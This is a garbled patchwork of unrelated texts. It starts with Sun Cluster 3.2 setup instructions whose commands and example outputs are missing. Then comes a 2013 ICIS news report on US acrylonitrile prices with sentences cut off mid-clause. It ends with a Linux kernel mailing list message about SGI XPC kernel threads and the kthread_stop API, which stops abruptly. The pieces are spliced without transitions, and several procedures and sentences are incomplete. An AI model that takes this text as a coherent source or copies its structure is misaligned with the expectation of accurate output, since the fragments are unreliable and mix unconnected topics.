This is a long tutorial. If you want a quick introduction to Azure App Service and Visual Studio web projects, see Create an ASP.NET web app in Azure App Service.
Or if you want to get started with Azure App Service before signing up for an Azure account, go to Try App Service, where you can immediately create a short-lived starter web app in App Service. No credit cards required; no commitments.
To complete this tutorial, you need a Microsoft Azure account. If you don't have an account, you can activate your MSDN subscriber benefits or sign up for a free trial.
To set up your development environment, you must install Visual Studio 2013 Update 4 or higher, and the latest version of the Azure SDK for Visual Studio 2013. This article was written for Visual Studio Update 4 and SDK 2.5.1.
From the File menu, click New Project.
In the New Project dialog box, expand C# and select Web under Installed Templates, and then select ASP.NET Web Application.
Name the application ContactManager, and verify that Web App is selected.
The configuration wizard will suggest a unique name based on ContactManager. You must decide whether to create a new App Service plan and resource group. For guidance on deciding whether to create a new plan or resource group, see Azure App Service plans in-depth overview. For this tutorial, you will probably want to create at least a new resource group. Select a region near you. You can use azurespeed.com to find the lowest latency data center. You will set up the database in the next step so do not click OK yet.
If you haven't created a database server before, select Create new server and enter a database name. Make sure the app and the database are in the same region.
In Solution Explorer, open the _Layout.cshtml file in the Views\Shared folder.
Replace the markup in the _Layout.cshtml file with the following code.
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>@ViewBag.Title - Contact Manager</title>
    @Styles.Render("~/Content/css")
    @Scripts.Render("~/bundles/modernizr")
</head>
<body>
    <div class="navbar navbar-inverse navbar-fixed-top">
        <div class="container">
            <div class="navbar-header">
                <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
                    <span class="icon-bar"></span>
                    <span class="icon-bar"></span>
                    <span class="icon-bar"></span>
                </button>
                @Html.ActionLink("CM Demo", "Index", "Cm", new { area = "" }, new { @class = "navbar-brand" })
            </div>
        </div>
    </div>
    <div class="container body-content">
        @RenderBody()
        <hr />
        <footer>
            <p>© @DateTime.Now.Year - Contact Manager</p>
        </footer>
    </div>
    @Scripts.Render("~/bundles/jquery")
    @Scripts.Render("~/bundles/bootstrap")
    @RenderSection("scripts", required: false)
</body>
</html>
Press CTRL+F5 to run the app.
The application home page appears in the default browser.
This is all you need to do for now to create the application that you'll deploy to Azure.
Enable SSL. In Solution Explorer, click the ContactManager project, then press F4 to bring up the Properties window. Change SSL Enabled to True. Copy the SSL URL; the assigned port will differ if you've previously created SSL web apps.
In Solution Explorer, right click the Contact Manager project and click Properties.
In the left tab, click Web.
Change the Project Url to use the SSL URL and save the page (Control S).
Verify Internet Explorer is the browser.
Next, you'll update the app to add the ability to display and update contacts and store the data in a database. The app will use the Entity Framework (EF) to create the database and to read and update data. The ASP.NET MVC scaffolding feature can automatically generate code that performs create, read, update, and delete (CRUD) actions.
In the Controller name text entry box, enter "CmController" for the controller name.
Click Add.
Visual Studio creates controller methods and views for CRUD database operations on Contact objects.
The next task is to enable the Code First Migrations feature, which creates the database based on the data model. The first parameter of the Add-Migration command (Initial) is arbitrary and is used to name the migration file.
using ContactManager.Models;
Replace the Seed method with the following code:
protected override void Seed(ContactManager.Models.ApplicationDbContext context)
{
    // This code initializes (seeds) the database with the contact information.
}

This code initializes (seeds) the database with the contact information. For more information on seeding the database, see Seeding and Debugging Entity Framework (EF) DBs. Run the application, and then click the CM Demo link, or navigate directly to the Cm controller.
The application shows the seed data and provides edit, details, and delete links. You can create, edit, delete, and view data. This tutorial uses Google as the OAuth authentication provider, as you will see. To use Facebook as an authentication provider, see my tutorial MVC 5 App with Facebook, Twitter, LinkedIn and Google OAuth2 Sign-on.
In addition to authentication, the tutorial will also use roles to implement authorization. Only those users you add to the canEdit role will be able to change data (that is, create, edit, or delete contacts).
Follow the instructions in my tutorial MVC 5 App with Facebook, Twitter, LinkedIn and Google OAuth2 Sign-on under Creating a Google app for OAuth 2 to set up a Google app for OAuth2. Run and test the app to verify you can log on using Google authentication.
If you want to create social login buttons with provider-specific icons, see Pretty social login buttons for ASP.NET MVC 5. Add the following using statements:
using Microsoft.AspNet.Identity; using Microsoft.AspNet.Identity.EntityFramework;
Add the following AddUserAndRole method to the class:
bool AddUserAndRole(ContactManager.Models.ApplicationDbContext context)
{
    IdentityResult ir;
    var rm = new RoleManager<IdentityRole>(new RoleStore<IdentityRole>(context));
    ir = rm.Create(new IdentityRole("canEdit"));
    var um = new UserManager<ApplicationUser>(new UserStore<ApplicationUser>(context));
    var user = new ApplicationUser() { UserName = "user1@contoso.com" };
    ir = um.Create(user, "P_assw0rd1");
    if (ir.Succeeded == false)
        return ir.Succeeded;
    ir = um.AddToRole(user.Id, "canEdit");
    return ir.Succeeded;
}

For more information, see my ASP.NET Identity tutorials.
In this section you will temporarily modify the ExternalLoginConfirmation method in the Account controller to automatically add new users registering with an OAuth provider to the canEdit role. Until we provide a tool to add and manage roles, we'll use this temporary automatic registration code. We hope to provide a tool similar to WSAT in the future, which will allow you to create and edit user accounts and roles.
Run the Update-Database command, which will run the Seed method, which in turn runs the AddUserAndRole method you just added. AddUserAndRole creates the user user1@contoso.com and adds her to the canEdit role.
In this section you will apply the Authorize attribute to restrict access to the action methods. Anonymous users will be able to view the Index action method of the home controller only. Registered users will be able to see contact data (The Index and Details pages of the Cm controller), the About, and the Contact pages. Only users in the canEdit role will be able to access action methods that change data.
Add the Authorize filter and the RequireHttps filter to the application in the RegisterGlobalFilters method of App_Start\FilterConfig.cs:

public static void RegisterGlobalFilters(GlobalFilterCollection filters)
{
    filters.Add(new HandleErrorAttribute());
    filters.Add(new System.Web.Mvc.AuthorizeAttribute());
    filters.Add(new RequireHttpsAttribute());
}

An alternative approach is to add the Authorize attribute and the RequireHttps attribute to each controller, but it's considered a security best practice to apply them to the entire application. By adding them globally, every new controller and action method you add will automatically be protected; you won't need to remember to apply them. For more information, see Securing your ASP.NET MVC App and the new AllowAnonymous Attribute.
The Authorize filter applied in the code above will prevent anonymous users from accessing any methods in the application. You will use the AllowAnonymous attribute to opt out of the authorization requirement in a couple methods, so anonymous users can log in and can view the home page. The RequireHttps will require all access to the web app be through HTTPS.
Add the AllowAnonymous attribute to the Index method of the Home controller. The AllowAnonymous attribute enables you to white-list the methods you want to opt out of authorization.
public class HomeController : Controller
{
    [AllowAnonymous]
    public ActionResult Index()
    {
        return View();
    }
}
Do a global search for AllowAnonymous; you can see it is also used in the log in and register methods of the Account controller.
If you are still logged in from a previous session, hit the Log out link.
Click on the About or Contact links. You will be redirected to the log in page because anonymous users cannot view those pages.
Click the Register as a new user link and add a local user with email joe@contoso.com. Verify Joe can view the Home, About and Contact pages.
Click the CM Demo link and verify you see the data.
Click an edit link on the page, you will be redirected to the log in page (because a new local user is not added to the canEdit role).
Log in as user1@contoso.com with the password "P_assw0rd1" (the "0" in "word" is a zero). You will now be able to edit contact data.
In Visual Studio, right-click the project in Solution Explorer and select Publish from the context menu.
The Publish Web wizard opens.
Click the Settings tab on the left side of the Publish Web dialog box. Click the v icon to select the Remote connection string for ApplicationDbContext, and select the ContactManagerNN_db connection string.
Right click on the web app and select Stop.
Alternatively, from the Azure Portal, you can select the web app, then click the stop icon at the bottom of the page.
await UserManager.AddToRoleAsync(user.Id, "canEdit");

Later in the tutorial, we will remove local account access.
Verify you can navigate to the About and Contact pages.
Click the CM Demo link to navigate to the Cm controller. Alternatively, you can append Cm to the URL.
Click an Edit link. You will be redirected to the log in page.
Right click on ContactDB and select Open in SQL Server Object Explorer.
If you haven't connected to this database previously, you may be prompted to add a firewall rule to enable access for your current IP address. The IP address will be pre-filled. Simply click Add Firewall Rule to enable access.
Then, log in to the database with the user name and password that you specified when creating the database.
Right-click the AspNetUsers table and select View Data. Verify that there are rows for user1@contoso.com and for the Google account you registered; the UserId column holds the key for each account.
Follow my tutorials which build on this sample:
To enable the social login buttons shown at the top of this tutorial, see Pretty social login buttons for ASP.NET MVC 5.
Tom Dykstra's excellent Getting Started with EF and MVC series will show you more advanced MVC and EF techniques. You can also request and vote on new topics at Show Me How With Code.
From: Andy Little (andy_at_[hidden])
Date: 2006-06-24 16:48:02
"Beth Jacobson" wrote
> Andy Little wrote:
>> "Beth Jacobson" wrote
>>
>> [...]
>>
>>> Under/overflow will certainly be an issue for some people if they can't
>>> specify their own base units, but I don't know if a tight coupling
>>> between units and dimensions is the best solution. Could there be
>>> some sort of global setting (a facet, maybe?) where we could specify
>>> units for base dimensions for the entire application?
>>
>> The quantity containers and unit typedefs can be easily customised by the
>> user
>> to whatever they prefer:
>>
>> namespace my{
>>
>> typedef boost::pqs::length::mm distance;
>> typedef boost::pqs::time::s time;
>> typedef boost::pqs::velocity::mm_div_s velocity;
>> }
>>
>> void f()
>> {
>> my::velocity v = my::distance(1) / my::time(1);
>>
>> }
>>
>
> That would remove the unit declarations from the code, but the program
> still wouldn't be unit agnostic. Say I wrote a function like this
>
> my::area GetArea(my::length len, my::length width)
> {
> return len*width;
> }
>
> If I used it in a program using SI units, it would work exactly like
> what I'm proposing, but if the calling program used imperial units, it
> would first convert len and width from feet to meters, then multiply
> them, then convert the result from square meters back to square feet.
> The results would be the same either way (assuming no rounding issues),
> but it adds three unnecessary conversions.
You could rewrite the function:
#include <boost/pqs/t1_quantity/types/length.hpp>
#include <boost/pqs/t1_quantity/types/out/area.hpp>
#include <boost/pqs/typeof_register.hpp>
#include <boost/type_traits/is_convertible.hpp>
#include <boost/utility/enable_if.hpp>
template <typename Out, typename In>
typename boost::enable_if<
boost::mpl::and_<
boost::is_convertible<In, boost::pqs::length::m>,
boost::is_convertible<Out, boost::pqs::area::m2>
>,
Out
>::type
GetArea(In len, In width)
{
return len*width;
}
namespace pqs = boost::pqs;
int main()
{
pqs::length::ft length(2);
pqs::length::ft width(1);
BOOST_AUTO(result, GetArea<pqs::area::ft2>(length,width));
std::cout << result <<'\n';
}
but using SI units is more efficient, sure. The main use of imperial units is
for input output AFAICS
FWIW you can also use enable_if to prevent unwanted conversions of the arguments
if you wish, by using boost::is_same rather than is_convertible.
>>> Both your example and mine have a common element though. They both
>>> involve moving between numeric values and dimensions. I can't think of
>>> an instance where units would be useful when that isn't the case. If
>>> that's true, then it seems like overkill to require bound units
>>> throughout the program. A simpler solution would be to prohibit
>>> dimension variables from being assigned or returning "raw" numbers. The
>>> only way to get or set a value would be through unit functions like this.
>>
>> PQS quantities can't be converted to raw numbers.
>>
>> double val = pqs::length::m(1) ;// Error
>>
>> but a function is provided to get the numeric_value:
>>
>> double val = pqs::length::m(1).numeric_value() ;// Ok
>>
>> Its name is quite long so it's easy to spot in code.
>
> Thanks. I didn't see it in the docs, but I figured there had to be some
> fairly straightforward way to extract the value.
Oops... good catch. It's not in the docs!
>>> Since
>>> units would be specified at the point of conversion, this method might
>>> even be a little safer. In pqs, you might do something like this
>>>
>>> pqs::length::m depth;
>>>
>>> // lots of code
>>
>> Its not possible to initialise a double from a quantity in PQS:
>>
>>> double depthAsDouble(depth);
>>
>> so the the above will not compile.
>
> Then the line would look like this
> double depthAsDouble = depth.numeric_value();
Yep!
>>> SetFieldValue("DepthInFt", depthAsDouble);
>>>
>>> cout << "Enter new depth (in feet): "
>>> cin >> depth;
>>>
>>> Because depth is declared far from where it's output and reassigned,
>>> these mistakes would be easy to miss.
>>
>> Not so for the above reason!
>
> But when I use numeric_value(), the problem still remains: there's
> nothing in that line to tell you the units of the extracted value. It's
> not essential that there should be, but since this is one place where
> the library can't protect the user against units errors, it would be
> nice if such errors were easier to recognize.
You can use the units_str(q) function:
#include <boost/pqs/t1_quantity/types/out/length.hpp>
#include <utility>
template <typename Q>
std::pair<std::string,double>
SetFieldValue(Q q)
{
std::pair<std::string,double> result(units_str(q),q.numeric_value());
return result;
}
namespace pqs = boost::pqs;
int main()
{
pqs::length::ft length(1);
std::pair<std::string,double> field = SetFieldValue(length);
std::cout << field.first << ' ' << field.second <<'\n';
}
But sure, if you remove the units then its up to you to deal with what the
number means.
>> In PQS the units are part of the type. IOW the numeric value and its unit are
>> always tightly coupled in code. That is a powerful feature. Once the numeric
>> part of a quantity is disassociated from its unit then manual checking and
>> external documentation is required, which is often the current situation
>> wherever doubles are used to represent quantities. Manual checking doesnt
>> always
>> work as well as intended... That of course is why the Mars lander crashed!
>
> I agree that unit checking can be an extremely useful feature, I'm just
> not convinced that tight coupling is necessary to achieve that.
FWIW, there is another quantity type planned where you can change the units at runtime.
> If my assumption that unit conversions are only needed when numeric
> values are assigned to or extracted from dimensions is correct, then
> dimensions don't really need to know about units. The units functions
> would need to have a concept of default dimension units so they'd know
> what they were converting from or to, but the dimensions themselves
> wouldn't know or care.
>
> That would be the real benefit of this system. Reducing the number of
> conversions and making units explicit at the point of conversion may
> have some small benefit, but making the dimensions library essentially
> unitless seems like a major advantage.
It depends what unitless means. If you want to just use base_units then you can.
The input output of units is a separate component, so you don't get it unless
you want it.
> Of course it's your library, and I'm not trying to dictate design. But
> if you're looking for a way to make the dimensions library essentially
> independent of units while retaining the unit safety of the current
> system, this might be a direction to consider.
Its difficult to see what you mean without a specific problem to consider.
regards
Andy Little
Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk | https://lists.boost.org/Archives/boost/2006/06/106747.php | CC-MAIN-2019-43 | refinedweb | 1,124 | 54.32 |
GameFromScratch.com
Along with many others, I don’t really recommend C++ as someone’s first language for various reasons. Sometimes concrete examples aren’t easy to come by off the tip of your tongue, so I figured the next time I encountered one of those things that make C++ so beginner unfriendly, I would post it. Not the obvious stuff like memory leaks, dealing with the linker or exceptionally cryptic template errors, but the more benign stuff that add up to frustrate new and experienced users. If you are a veteran C++ coder, you will probably spot the problem in a second or two, but this is the kind of thing that will trip up a beginner completely and is a complete nightmare to solve.
Consider the following C++ header file:
#pragma once
#include <map>
#include <stdexcept>
#include <string>
#include "SFML/Audio.hpp"
class SoundFileCache
{
public:
SoundFileCache(void);
~SoundFileCache(void);
const sf::Sound& GetSound(std::string) const;
const sf::Music& GetSong(std::string);
private:
static std::map<std::string, sf::Sound> _sounds;
static std::map<std::string, sf::Music> _music;
};
class SoundNotFoundExeception : public std::runtime_error
{
public:
SoundNotFoundExeception(std::string const& msg):
std::runtime_error(msg)
{}
}
Pretty straight forward stuff right? Two class declarations, nothing really funky going on. Now consider the following implementation:
#include "StdAfx.h"
#include "SoundFileCache.h"
SoundFileCache::SoundFileCache(void) {}
SoundFileCache::~SoundFileCache(void) {}
const sf::Sound& SoundFileCache::GetSound(std::string soundName) const
{
std::map<std::string,sf::Sound>::iterator itr = _sounds.find(soundName);
if(itr == _sounds.end())
{
sf::SoundBuffer soundBuffer;
if(!soundBuffer.LoadFromFile(soundName))
{
throw new SoundNotFoundExeception(
soundName + " was not found in call to SoundFileCache::GetSound");
}
sf::Sound sound;
sound.SetBuffer(soundBuffer);
_sounds.insert(std::pair<std::string,sf::Sound>(soundName,sound));
}
else
{
return itr->second;
}
}
const sf::Music& SoundFileCache::GetSong(std::string soundName)
{
//stub
}
Again, pretty standard code, ignore the fact GetSound and GetSong don’t return values, they aren’t the issue here.
Now consider the error:
error C2533: 'SFMLSoundProvider::{ctor}' : constructors not allowed a return type
If you are new to the expression ctor, it basically just shorthand for constructor. For the record, it’s Visual Studio Express 2010 and if you double click that error, it brings you to this line:
SoundFileCache::SoundFileCache(void) {}
So… what’s the problem? By the error, it is quite obvious that the constructor doesn’t in fact return a value, so the message is clearly not the problem.
What then is the problem? I’ll show you after this brief message from our sponsors…
Welcome back… figured it out yet? If not, I don’t blame you, the warning sure as hell didn’t help. Here then is the offending code:
class SoundNotFoundExeception : public std::runtime_error
{
public:
SoundNotFoundExeception(std::string const& msg):
std::runtime_error(msg)
{}
} <-- Missing semicolon
So, forgetting a semi colon ( something you will do A LOT! ) results in a message that your constructor cannot return a value. Now, once you’ve been coding C++ for a while this kind of stuff becomes pretty much second nature. Getting nonsensical error messages? Check your header for a missing include guard or semi colon become pretty much the norm. But for a new developer, this is the beginning of a complete train wreck.
Think about it for a second: you just wrote some of your first code, the error says you are returning something you aren't, the compiler is pointing at your constructor, and now you need to figure out just WTF is going on. What do you do? Many run off to a forum and post the error verbatim and hope for an answer ( which they will probably get, learning nothing in the process ). Hopefully you Google it using exact quotes, but even then you get forum answers like this where you have a bunch of other new developers fixating on the error message itself and leading the developer down a wild goose chase. Fortunately a moderator stepped in and gave a proper explanation, but that doesn't always happen. Even worse, it is a legit error: you really can't return from a ctor, so if you encounter it again in the future you may actually have a real problem but find yourself instead on a missing semi-colon hunt!
How would this work in Java, C#, Python or Ruby? Well, it wouldn't, as no other modern language I can think of uses header files any more. For good reason too: they add a level of complexity for very little positive return. It could be argued that separating interface from implementation is "a good thing", but even that is munged up by the fact you can actually have your implementation in your header file. Also, don't get me wrong, other languages have their faults too; just wait till you get forced to go on your first Java XML-configured error hunt, and you will be begging for C++ errors again!
This is just a classic example of the little things experienced developer forget the pain of experiencing in the first place! As I said, once you’ve got a bit of experience this kind of stuff becomes second nature, but while you are learning this kind of error is absolutely horrific. It’s little things like this that add up and make it so hard to recommend new developers start with C++. When I say it isn’t pointers and memory management that make C++ difficult, I mean it. It’s crap like this.
Like most readers, I write lots of unit tests as I code. I don't do TDD, which requires writing the tests beforehand, but I often have two panes open in my IDE at the same time one with the class I'm coding and one in which I'm banging out the corresponding unit tests. This allows me to test my code immediately when I save and build. Right away, I can tell that my code works correctly or contains off-by-one errors and other gremlins. I find this way of proceeding very agreeable. I have confidence in my code; and as I build up the large set of tests, I know I'm not inadvertently disrupting my previous work or that of my colleagues.
However, after years of working this way, I find that many tests are often hard to read. It's not the code itself (JUnit has done a good job over the years of improving syntax), it's that I often need to read the entire test through to understand what's being tested. Moreover, tests frequently have specific set-up requirements that can make up a significant portion of the test before the actual crucial line checks an
assert statement. And that
assert statement is often not terribly informative.
A final difficulty is JUnit's suboptimal syntax for supporting parameterized tests. These are the tests in which you send lots of values to the same routine to make sure it provides the right response under a variety of inputs. For example, if you are parsing regular expressions and testing the error detection, you'd want to send a large number of incorrect combinations and make sure all are properly rejected. With JUnit, such a test requires a lot of choreography.
So for a while, I've been looking at how to make my tests more readable and easier to write. The solution I've been moving towards is to use BDD tools. BDD (behavior-driven development) has at its core a series of tests that specify what behavior a program should exhibit when a certain action takes place. The many BDD frameworks in use today favor a syntax that has a flow that's roughly: Given a situation, when an action occurs, then a specified set of results should ensue. For example:
given a bank balance of $100
when a withdrawal of $150 is attempted
then an error should be displayed and the balance should be $100
I write lots of these tests, too. While I should embrace the entire BDD philosophy, which prescribes translating all requirements and user stories into tests of this kind, I instead write these tests just before I start in on a given piece of work. They are higher-level than unit tests and often span multiple units. Ideally, they incarnate some activity that would normally be part of UATs.
Most BDD frameworks ride on top of JUnit, which enables easy integration into innumerable IDEs and workflows. As a result, it is entirely possibly to write unit tests using this kind of syntax. Over the last year, I've been doing more of this. And as the readability soars, I find that I've essentially forgone the old, classic JUnit syntax.
In my case, because I like writing unit tests in Groovy, I use a Groovy-based framework, called Spock. (There are many other options including easyb and Cucumber. They all do roughly the same thing and use similar syntax.) The choice of Groovy to write unit tests for Java code is probably worth a separate editorial, but is one of the most productive decisions I've taken. Groovy has many useful features that simplify writing tests. The two that leap to mind are optional typing, which facilitates creating test objects, and method injection. Groovy's metaprogramming capabilities enable me to inject a new method into any object on the fly. Powerful stuff!
Returning to Spock, here's an example of a parameterized test:
class HelloSpock extends spock.lang.Specification {
def "length of Spock's and his friends' names"() {
expect: name.size() == length
where: name | length
"Spock" | 5
"Kirk" | 4
"Scotty" | 6
}
}
Notice the test name is a string, which appears in any failure diagnostic. Already this is more readable than trying to use the JUnit convention of putting the explanation in an oversized Java method name. The test is clearly evident in the "expect" statement; the table of values in the "where" statement is clear, understandable, and trivial to write. The result of this elegant and quick syntax is that I often go overboard and create a table with every possible edge value. In the above example, for example, I would surely test an empty string as well as one that consisted only of spaces.
More-complex tests are also elegantly supported. For example:
def "should send messages to all subscribers"() {
when:
publisher.send("hello")
then:
1 * subscriber.receive("hello")
1 * subscriber2.receive("hello")
}
This test verifies that when a publisher sends a "hello" message, the two subscribers receive it exactly once. If they don't receive it or receive it more than once, the test fails. It's not hard to extend this snippet to express the expected behavior of mocks, is it?
I could go on; but the point is that, using this new syntax, my tests are far more readable, easier to write, and they invite me to include truly comprehensive testing at unit levels and higher.
— Andrew Binstock
Editor in Chief
alb@drdobbs.com
Twitter: platypusguy | http://www.drdobbs.com/jvm/java-message-service/jvm/a-better-syntax-for-unit-tests/240163843 | CC-MAIN-2016-36 | refinedweb | 923 | 61.97 |
While trying to emerge rzip 2.0-r1, I ran into the following problem:
checking for BZ2_bzBuffToBuffCompress in -lbz2... yes
checking for errno in errno.h... yes
checking for mmap... yes
checking for strerror... yes
checking for getopt_long... yes
updating cache ./config.cache
creating ./config.status
creating Makefile
creating config.h
gcc -I. -I. -O2 -pipe -c rzip.c -o rzip.o
gcc -I. -I. -O2 -pipe -c runzip.c -o runzip.o
gcc -I. -I. -O2 -pipe -c main.c -o main.o
main.c: In function 'write_magic':
main.c:50: error: 'uint32_t' undeclared (first use in this function)
main.c:50: error: (Each undeclared identifier is reported only once
main.c:50: error: for each function it appears in.)
main.c:50: error: parse error before "v"
main.c:62: error: 'v' undeclared (first use in this function)
main.c: In function 'read_magic':
main.c:78: error: 'uint32_t' undeclared (first use in this function)
main.c:78: error: parse error before "v"
main.c:92: error: 'v' undeclared (first use in this function)
main.c: In function 'decompress_file':
main.c:143: warning: assignment makes pointer from integer without a cast
make: *** [main.o] Error 1
make: *** Waiting for unfinished jobs....
!!! ERROR: app-arch/rzip-2.0-r1 failed.
!!! Function src_compile, Line 567, Exitcode 2
!!! emake failed
USE="imagemagick nls png ppc-macos sdl userland_Darwin kernel_Darwin elibc_Darwin"
Unset: ASFLAGS, CTARGET, LANG, LC_ALL, LDFLAGS, LINGUAS, PORTDIR_OVERLAY
Created an attachment (id=68517)
rzip-2.0-darwin.patch.
Didn't work for me ;(
However, I could get it at least to compile if I add a
#include <stdint.h> in main.c or rzip.h
do you have the latest XCode tools installed?
> do you have the latest XCode tools installed?
XCode 2.0 (came with my Tiger CD)
Build 514, I suppose.
Latest is XCode 2.1, I think.
but which one do you have installed?
I use XCode 2.1, build 621
> but which one do you have installed?
XCode 2.0 (came with my Tiger CD)
Build 514
Do you care about upgrading? We only support the latest XCode tools, because
it
also solves a lot of linker problems.
> Do you care about upgrading? We only support the latest XCode tools, because it
> also solves a lot of linker problems.
Done upgrading to XCode 2.1
With the patch rzip emerges fine.
Ok, then I will check this one on Pather today, and see if it works there too
with the latest Xcode available there. I think I can check this in later today.
Thanks for trying Dirk.
compiled and worked on Panther also.
I am hestitant to put this in portage in the same ebuild. ferringb, could you
advise on this patch whether to apply is unconditional or not, and put it in the
current ebuild, or in a -r2? And do you agree with it?
Yuck.
Conditionally pull in a strndup function is my preferred solution.
Created an attachment (id=68679)
extended patch that uses autoconf to check for strndup
this patch uses autoconf to check for strndup and uses replacement code only
when not available.
Created an attachment (id=68680)
patches applied to the sources
Another attempt to fix the issue, this time a little bit decent.
I created a separate file that holds the strndup implementation. Its header
file is now included by the main.c file. The strndup code is optional based on
the existence of strndup according to configure.
Created an attachment (id=68681)
strutils.c
strutils.c file which implements strndup
Created an attachment (id=68682)
strutils.h
header file for strutils.c
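The attachment bodies aren't reproduced in this thread, but a replacement along the lines described (an strndup work-alike compiled only when configure finds none) might look like this; the name local_strndup is illustrative, not taken from the actual patch:

```c
#include <stdlib.h>
#include <string.h>

/* strndup() replacement for platforms whose libc lacks it, such as the
 * Darwin libc discussed in this bug.  In the real ebuild this definition
 * would be guarded by an autoconf HAVE_STRNDUP check. */
static char *local_strndup(const char *s, size_t n)
{
    size_t len = strlen(s);
    char *copy;

    if (len > n)
        len = n;            /* copy at most n characters */
    copy = malloc(len + 1);
    if (copy == NULL)
        return NULL;
    memcpy(copy, s, len);
    copy[len] = '\0';       /* always NUL-terminate */
    return copy;
}
```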
Created an attachment (id=68688)
patched ebuild
these are my changes to the ebuild to get the previously supplied files and
patches working
> these are my changes to the ebuild to get the previously supplied files and
> patches working
I think the code looks good, and the package emerges fine.
Created an attachment (id=68987)
cleaned up patch
Hola. cleaned up the patch a bit, fixing up lot of old/icky autoconf crap with
it, and lack of DESTDIR make support.
please take it for a spin;
Created an attachment (id=68988)
updated ebuild patch.
> Hola. cleaned up the patch a bit, fixing up lot of old/icky autoconf crap with
> it, and lack of DESTDIR make support.
> please take it for a spin;
Emerges fine here.
patch is in as rzip-2.0-r1, keyword at your leisure. ;)
-r2 I assume/know for sure.
now also available for ~ppc-macos-xians
Brian, thanks for your additional patching/efforts!
This "cleaned up" patch that is "fixing up lot of old/icky autoconf crap with
it" broke rzip on at least x86. See bug [217552]. And yes, I choose ugly but
working over nice but breaking silently every time. | http://bugs.gentoo.org/105858 | crawl-002 | refinedweb | 837 | 78.75 |
Routing in React Applications
In the last post, we talked about how to set up a real React environment and make a real React application. But a React application is not really complete without routing. What's this whole routing thing, you ask? You know how the address changes when you navigate around a website? That's because the site is routing you from one address to another. On WordPress and other "traditional" websites, a full page load happens for every page you visit. In React applications, however, we have routing that doesn't require a page reload.
In contrast to the standard websites we are familiar with, in React (and Angular, by the way) you can choose whichever routing system you want. For educational purposes, and to make examples for this article, I'll use the popular React routing system called... (wait for it...) React Router. Guess you didn't fall out of your chair, right? What's good about this React routing system is that it's simple. In order to practice with it, we'll build an application that contains a home page and an about page.
To get started, we'll create a React application using Create React App. The command that follows installs the routing. And no, it's not terribly complicated: all it is is a very simple node module. Go to the command line and run:
npm install react-router-dom --save
The --save flag keeps react-router-dom listed inside package.json, our dependency file. After we've done this, we can start using React Router. That's right, it's just that simple!
In order to start using React routing, we need to wrap our entire application, or at least the part that will use the routing, in a router component.
import React from 'react';
import { BrowserRouter, Switch, Route, Link } from 'react-router-dom';
import Home from './Home.jsx';
import About from './About.jsx';

class MainApp extends React.Component {
  render() {
    return <BrowserRouter>
      <div>
        <nav>
          <ul>
            <li><Link to='/'>Home</Link></li>
            <li><Link to='/about'>About</Link></li>
          </ul>
        </nav>
        <h1>This is my App</h1>
        <main>
          <Switch>
            <Route exact path='/' component={Home} />
            <Route path='/about' component={About} />
          </Switch>
        </main>
      </div>
    </BrowserRouter>;
  }
}

export default MainApp;
There are a few router pieces here. The first is the main element, whose content changes according to the route we choose. Inside the main there is the Switch, which has the routing components inside of it, one for each path; each Route loads the component it's given when the path matches. How do we change the path? Notice the Link component, which takes the 'to' property.
You can see how this works in the demo that I made. It’s a little wacky, ‘cause the routes that I wrote aren’t really the best, but notice that it doesn’t really matter because there isn’t any page reload. I just wanted to take care of the routing—the application is very basic so that anyone who wants to can learn from it.
So now it’s time to build your own practice application and play around with it a bit so you can better understand the basics of routing. It’s pretty easy really, once you grasp the idea of the components. | http://www.discoversdk.com/blog/routing-in-react-applications | CC-MAIN-2019-09 | refinedweb | 569 | 73.17 |
GraphQL Config
Explore our services and get in touch.
TLDR
- Visit our website graphql-config.com
- GraphQL Config is one simple place to store all your GraphQL Configurations for any GraphQL based tool
- Prisma recently transferred the project to The Guild — and we completely rewrote it and addressed more than ⅔ of the issues (and the remaining are waiting for feedback)
- We’ve already merged configurations from GCG, GraphQL Inspector, GraphQL CLI — and are looking to learn and integrate with GraphiQL, AppSync, Apollo, Gatsby, VS-Code extensions, Relay and the GraphQL team at Facebook and any GraphQL tool creators
- This is an alpha phase — we want your feedback, as a user and as a creator — Please create an issue or join our Discord channel
How did we get here?
About 2 years ago Prisma came up with a great idea for the GraphQL community — Why repeat yourself in creating your configuration for each tool you use in your application.
So together with many developers from the GraphQL community, they introduced the GraphQL Config library and spec and many tools have since embraced that standard.
But time has passed and the library slowly became unmaintained.
Prisma were very kind and generous with moving the project forward and passing it to us.
So when we took over the GraphQL Config, our main goal was to bring it back to life and push it forward for the community.
We asked for feedback, looked at existing and new tools that came out since it was released, went through all the open issues and PRs, listened to your suggestions and got to work!
Our main goals are
- Highly customizable and extensible
- More useful structure
- Flexible and helpful enough to become a standard in the community
- Make it platform agnostic (Node, Browser)
Try it out today
We’ve already refactored most of the code, created a new structure, referenced all the related issues and released a new alpha version:
npm install graphql-config@next
yarn add graphql-config@next
Now we want to hear from you — GraphQL developers and GraphQL tool creators.
Here is a deeper dive into what we’ve done:
Different formats of GraphQL Config file
The new GraphQL Config now allows to use JSON, YAML and JavaScript.
GraphQL Config looks for:
.graphqlrc
.graphqlrc.yaml
.graphqlrc.yml
.graphqlrc.json
.graphqlrc.js
graphql.config.js
The new config can also be created programmatically too.
It also accepts a config defined under the graphql property in your package.json file.
We’re open to expand the range of file names and looking forward to hear more of your use cases.
New structure
GraphQL Config allowed to indicate a single graphql file, an introspection file or a URL to an endpoint. That’s the past!
schema: './schema.graphql'
documents: './my/app/**/*.graphql'
extensions:
  customConfig:
    value: true
Schema
We’ve decided to expand GraphQL Config for variety of sources of GraphQL Schema and rename
schemaPath to just
schema.
It accepts now not only a single file but also a glob pattern to match your modularized schema.
It allows you to generate the schema from:
- files matching a glob pattern (or a list of patterns)
- an explicit list of files
- an endpoint
- an introspection file
- TypeScript and JavaScript files
- and even more…
This was possible thanks to the concept of Loaders, which we'll talk about later in the article.
Documents
The majority of GraphQL tools depend not only on the Schema but also on Operations and Fragments, so we've decided to cover that use case too.
With the new GraphQL Config, you’re able to indicate files containing GraphQL operations and fragments (documents) and load them all within a single method.
GraphQL Config accepts not only .graphql files but also extracts documents from TypeScript and JavaScript files, including JSX and TSX.
import React from 'react';
import gql from 'graphql-tag';
import { useQuery } from '@apollo/react-hooks';

// GraphQL Config is able to extract it!
const GET_USERS = gql`
  {
    user {
      id
      name
    }
  }
`;

export function Users() {
  const { loading, error, data } = useQuery(GET_USERS);
  // ...
  return <UsersList users={data.users} />;
}
